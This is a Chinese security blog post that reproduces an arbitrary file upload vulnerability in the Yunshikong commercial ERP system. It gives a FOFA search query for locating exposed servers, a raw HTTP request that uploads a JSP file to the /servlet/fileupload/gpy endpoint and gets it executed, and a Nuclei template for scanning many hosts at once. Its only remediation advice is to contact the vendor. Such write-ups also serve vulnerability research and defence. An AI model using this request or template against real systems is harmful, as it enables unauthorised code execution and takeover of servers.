漏洞复现--云时空商业ERP文件上传

最新推荐文章于 2023-12-12 11:01:40 发布
最新推荐文章于 2023-12-12 11:01:40 发布
阅读量581 收藏 11
点赞数 7
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53003652/article/details/134830881
版权

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

一:漏洞描述

云时空商业ERP以大型集团供应链系统为支撑,是基于互联网技术的多渠道模式营销服务管理体系,可以帮助您整合线上和线下交易模式,覆盖企业经营管理应用各个方面。该产品存在任意文件上传漏洞,攻击者可通过此漏洞获取服务器权限。

二:漏洞影响版本

不详

三:网络空间测绘查询

fofa:
app="云时空社会化商业ERP系统"
image.png

四:漏洞复现

image.png
POC:

POST /servlet/fileupload/gpy HTTP/1.1
Host:x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=4eea98d02AEa93f60ea08dE3C18A1388
Content-Length: 215

--4eea98d02AEa93f60ea08dE3C18A1388
Content-Disposition: form-data; name="file1"; filename="test.jsp"
Content-Type: application/octet-stream
 
<% out.println("This website has a vulnerability"); %>
--4eea98d02AEa93f60ea08dE3C18A1388--

image.png
访问/uploads/pics/【返回的日期】/【上传文件名称】
image.png
成功解析

五:批量验证

id: yun-shiKong-Upload

info:
  name: yun-shiKong-Upload
  author: 芝士土拨鼠
  severity: high
  description: 云时空商业ERP以大型集团供应链系统为支撑,是基于互联网技术的多渠道模式营销服务管理体系,可以帮助您整合线上和线下交易模式,覆盖企业经营管理应用各个方面。该产品存在任意文件上传漏洞,攻击者可通过此漏洞获取服务器权限。

requests:
  - raw:
      - "POST /servlet/fileupload/gpy HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0\
        \ (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0\nAccept:\
        \ text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\n\
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\n\
        Accept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests:\
        \ 1\nContent-Type: multipart/form-data; boundary=4eea98d02AEa93f60ea08dE3C18A1388\n\
        Content-Length: 213\n\n--4eea98d02AEa93f60ea08dE3C18A1388\nContent-Disposition:\
        \ form-data; name=\"file1\"; filename=\"test.jsp\"\nContent-Type: application/octet-stream\n\
        \ \n<% out.println(\"This website has a vulnerability\"); %>\n--4eea98d02AEa93f60ea08dE3C18A1388--"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - fileRealName
      - type: status
        status:
          - 200

image.png

六:修复方案

联系厂家获取漏洞修复补丁

芝士土包鼠
关注
  • 7
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Hikvision IVMS-8700 任意文件上传(含批量验证poc
weixin_43567873的博客
04-07 344
Hikvision IVMS-8700 任意文件上传(含批量验证poc
【0day】复现时空智友企业流程化管控系统wc.db数据库文件泄露漏洞
记录并分享学习安全的知识点..
11-22 365
时空智友企业流程化管控系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化,从而提高工作效率、降低成本并提升管理水平。时空智友企业流程化管控系统存在任意文件读取漏洞,攻击者攻击者可以在未经授权的情况下读取系统上的任意文件。时空智友企业流程化管控系统存在wc.db数据库文件泄露,可根据泄露信息,进行下一步利用。
漏洞复现-速达软件全系产品存在任意文件上传漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-07 646
漏洞复现速达软件全系产品任意文件上传漏洞,附带自己写的poc脚本
时空智友企业流程化管控系统文件上传漏洞
holyxp的博客
08-23 709
时空智友企业流程化管控系统是一个功能丰富、灵活可定制的企业管理工具。通过该系统,企业能够实现流程的自动化、协同的提升、数据的洞察和决策的优化,从而提高工作效率、管理水平和企业竞争力。时空智友企业流程化管控系统 formservice接口处存在任意文件上传漏洞,未经认证的攻击者可通过此接口上传后门文件,最终可导致服务器失陷。
漏洞复现时空社会化商业ERP系统gpy文件上传
失心少年
12-12 669
本文所提供的工具仅用于学习,禁止用于其他!用友软件的先进管理理念,汇集各医药企业特色管理需求,通过规范各个流通环节从而提高企业竞争力、降低人员成本,最终实现全面服务于医药批发、零售连锁企业的信息化建设的目标,是一款全面贴合最新GSP要求的医药流通行业一站式管理系统。时空社会化商业ERP gpy接口处存在文件上传漏洞,未经身份认证的攻击者可通过该漏洞在服务器端上传任意文件,执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。拼接以下路径并在浏览器中访问上传文件地址…
用友时空KSOAV9.0文件上传漏洞复现
weixin_53884648的博客
05-22 1242
用友时空文件上传漏洞复现
金蝶ERP解决方案-供应链
最新发布
04-13
金蝶ERP解决方案中的供应链管理模块,旨在为企业提供一套完整的供应链解决方案。该方案不仅覆盖了采购、销售、库存等多个业务领域,而且能够有效地整合信息流、物流以及资金流,实现企业内部供应链业务的全面管理...
管易C-ERP与金蝶对接说明
01-25
管易C-ERP与金蝶对接说明/管易C-ERP与金蝶对接说明
EJB的商业应用实例.rar_ejb_java-ERP
09-23
java(ejb)编写的商业应用实例--定购单
QDIS-ERP-AP150-OracleERP基础操作培训.pptx
04-16
QDIS-ERP-AP150-OracleERP基础操作培训
Iyogera-v2.0:Iyogera学校ERP版本v2.0的更新
05-12
Iyogera-v2.0 Iyogera学校ERP版本v2.0的更新
时空智友企业信息管理系统任意文件读取漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-07 553
时空智友企业信息管理系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化,从而提高工作效率、降低成本并提升管理水平。时空智友企业信息管理系统存在任意文件读取漏洞,攻击者可以在未授权的情况下读取系统上的文件。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
时空智友企业管控系统文件上传漏洞复现
09-18 458
时空智友企业流程化管控系统是一款企业信息管理软件,致力于协助大健康企业构建内部信息化,解决GSP管理、多组织管理、财务管理、税控管理、线上线下一体化等问题。该系统可以帮助企业实现流程化管控,提高工作效率和管理水平。
UEditor 任意文件上传漏洞
qq_50854662的博客
10-27 2万+
UEditor于近日被曝出高危漏洞,包括目前官方UEditor 1.4.3.3 最新版本,都受到此漏洞的影响,ueditor是百度官方技术团队开发的一套前端编辑器,可以上传图片,写文字,支持自定义的html编写,移动端以及电脑端都可以无缝对接,自适应页面,图片也可以自动适应当前的上传路径与页面比例大小,一些视频文件的上传,开源,高效,稳定,安全,一直深受站长们的喜欢。 百度的UEditor文......
Pocsuite编写ActiveMQ任意文件上传漏洞脚本
qq_40997679的博客
10-07 445
想了解更多Pocsuite脚本、请关注微信公众号【白猫学安全
WebLogic 任意文件上传 远程代码执行漏洞 (CVE-2018-2894)------->>>任意文件上传检测POC...
weixin_30339969的博客
07-19 326
前言: Oracle官方发布了7月份的关键补丁更新CPU(Critical Patch Update),其中针对可造成远程代码执行的高危漏洞 CVE-2018-2894 进行修复: http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html CVE-2018-2894 由中国国家互联网应急中心 CNC...
Tomcat任意文件上传漏洞CVE-2017-12615复现测试
热门推荐
黑面狐
09-20 3万+
今天爆出了一个tomcat7的任意文件上传漏洞,看了大牛们的分析后,我自己本地搭建环境复测。 漏洞影响的tomcat版本为tomcat7.0.0-7.0.81版本 我本地下载的是tomcat7.0.56版本测试 测试过程: 1.下载tomcat7.0.0-7.0.81版本,解压后修改conf/web.xml文件添加readonly参数,属性值为false 如图: 然后启动tom
某office前台任意文件上传漏洞分析
HBohan的博客
12-15 1375
某office前台任意文件上传漏洞分析
管易C-ERP与金蝶对接配置指南
管易C-ERP与金蝶的对接是一个关键的整合步骤,目的是实现两个系统的无缝连接,提高企业运营效率。对接涉及多个层面,包括系统版本、功能模块、接口配置以及业务单据的同步。 首先,确保**系统版本**是兼容的。管...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值